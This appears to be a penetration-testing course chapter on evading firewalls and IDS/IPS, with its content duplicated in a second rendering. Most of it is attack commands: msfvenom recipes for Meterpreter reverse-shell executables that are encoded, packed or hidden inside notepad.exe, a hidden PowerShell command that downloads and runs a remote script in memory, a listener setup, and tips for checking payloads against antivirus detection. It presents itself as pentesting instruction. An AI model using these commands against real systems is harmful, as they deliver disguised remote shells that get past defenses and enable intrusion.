Firewall and IDS/IPS Evasion

Overview

Firewalls and intrusion detection/prevention systems (IDS/IPS) are critical components of modern network security. As penetration testers, understanding how to bypass these defenses is essential for conducting stealthy and effective engagements. This chapter covers techniques for evading detection and delivering payloads while maintaining operational security.

Firewall and IDS/IPS Basics

Firewalls:
- Control traffic flow based on predefined rules.
- Block or allow packets based on:
  - Source/Destination IP
  - Ports
  - Protocols
- Types:
  - Network Firewalls (e.g., hardware-based solutions like Cisco ASA)
  - Host-Based Firewalls (e.g., Windows Defender Firewall)
IDS/IPS:
- IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts.
- IPS (Intrusion Prevention System): Actively blocks malicious traffic.
- Detection methods:
  - Signature-Based: Matches traffic patterns against known attack signatures.
  - Anomaly-Based: Flags traffic that deviates from normal behavior.

Techniques for Firewall Evasion

Port Spoofing:
- Use non-standard ports for payload delivery (e.g., port 443 for HTTPS).
- Example:
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe

Payload Obfuscation:

Encode payloads using tools like msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe

Split Payload Delivery:
- Deliver payloads in fragments to bypass large-payload filters.
- Example: Use PowerShell to download and execute a payload in memory:
  powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/payload.ps1')"
DNS Tunneling:
- Encapsulate payload traffic in DNS queries to bypass firewalls.
- Example tool: dnscat2.
HTTP/HTTPS Tunneling:
- Use HTTP/HTTPS to route traffic through firewalls that allow web traffic.
- Configure a reverse shell:
  msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe

Techniques for IDS/IPS Evasion

Signature Evasion:

Modify payloads to avoid matching known attack patterns:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe

Traffic Encryption:

Use encrypted channels (e.g., HTTPS) for command and control traffic.

Example:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <ip>
set LPORT 443
exploit

Timing Attacks:
- Send traffic in bursts or delays to avoid triggering anomaly-based detection.
- Example: Use Nmap with timing options:
  nmap -T2 -sS <target_ip>
Packer Tools:
- Use packers to obfuscate executable payloads.
- Popular packers:
  - UPX:
    upx --best --lzma payload.exe
  - Themida: Advanced commercial packer with anti-reverse engineering features.

Legitimate Application Templates:

Embed payloads in legitimate applications or documents.

Example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe

Evasion Example: Using msfvenom with Custom Templates

Generate an Encrypted Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe

Embed Payload in a Legitimate Application:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe

Use HTTPS for Stealth:

msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe

Verify Payload Detection:
- Upload the payload to VirusTotal to check for AV detection:
  msf-virustotal -k <api_key> -f payload.exe

Best Practices for Evasion

Test in a Sandbox:
- Verify payload functionality in a controlled environment.
Avoid Reuse:
- Customize payloads for each engagement to avoid detection by updated signatures.
Combine Techniques:
- Layer multiple evasion methods (e.g., encoding + encryption).
Stay Updated:
- Keep up with the latest evasion techniques and tools.

Command Cheatsheet

Command

Description

msfvenom -p <payload>

Generate payloads.

msfvenom -e <encoder>

Encode payloads for evasion.

upx --best --lzma <file>

Compress and obfuscate payloads.

msf-virustotal -k <api_key>

Check payload detection rates on VirusTotal.

nmap -T2

Conduct slow scans to avoid IDS detection.

PreviousWriting and Importing Custom Modules into Metasploit NextPassword Attacks

Overview

Firewall and IDS/IPS Basics

Firewalls:

Control traffic flow based on predefined rules.
Block or allow packets based on:
- Source/Destination IP
- Ports
- Protocols
Types:
- Network Firewalls (e.g., hardware-based solutions like Cisco ASA)
- Host-Based Firewalls (e.g., Windows Defender Firewall)

IDS/IPS:

IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts.
IPS (Intrusion Prevention System): Actively blocks malicious traffic.
Detection methods:
- Signature-Based: Matches traffic patterns against known attack signatures.
- Anomaly-Based: Flags traffic that deviates from normal behavior.

Techniques for Firewall Evasion

Port Spoofing:

Use non-standard ports for payload delivery (e.g., port 443 for HTTPS).

Example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe

Payload Obfuscation:

Encode payloads using tools like msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe

Split Payload Delivery:

Deliver payloads in fragments to bypass large-payload filters.

Example: Use PowerShell to download and execute a payload in memory:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/payload.ps1')"

DNS Tunneling:

Encapsulate payload traffic in DNS queries to bypass firewalls.
Example tool: dnscat2.

HTTP/HTTPS Tunneling:

Use HTTP/HTTPS to route traffic through firewalls that allow web traffic.

Configure a reverse shell:

msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe

Techniques for IDS/IPS Evasion

Signature Evasion:

Modify payloads to avoid matching known attack patterns:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe

Traffic Encryption:

Use encrypted channels (e.g., HTTPS) for command and control traffic.

Example:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <ip>
set LPORT 443
exploit

Timing Attacks:

Send traffic in bursts or delays to avoid triggering anomaly-based detection.
Example: Use Nmap with timing options:
```
nmap -T2 -sS <target_ip>
```

Packer Tools:

Use packers to obfuscate executable payloads.
Popular packers:
- UPX:
  upx --best --lzma payload.exe
- Themida: Advanced commercial packer with anti-reverse engineering features.

Legitimate Application Templates:

Embed payloads in legitimate applications or documents.

Example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe

Evasion Example: Using msfvenom with Custom Templates

Generate an Encrypted Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe

Embed Payload in a Legitimate Application:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe

Use HTTPS for Stealth:

msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe

Verify Payload Detection:

Upload the payload to VirusTotal to check for AV detection:
```
msf-virustotal -k <api_key> -f payload.exe
```

Best Practices for Evasion

Test in a Sandbox:

Verify payload functionality in a controlled environment.

Avoid Reuse:

Customize payloads for each engagement to avoid detection by updated signatures.

Combine Techniques:

Layer multiple evasion methods (e.g., encoding + encryption).

Stay Updated:

Keep up with the latest evasion techniques and tools.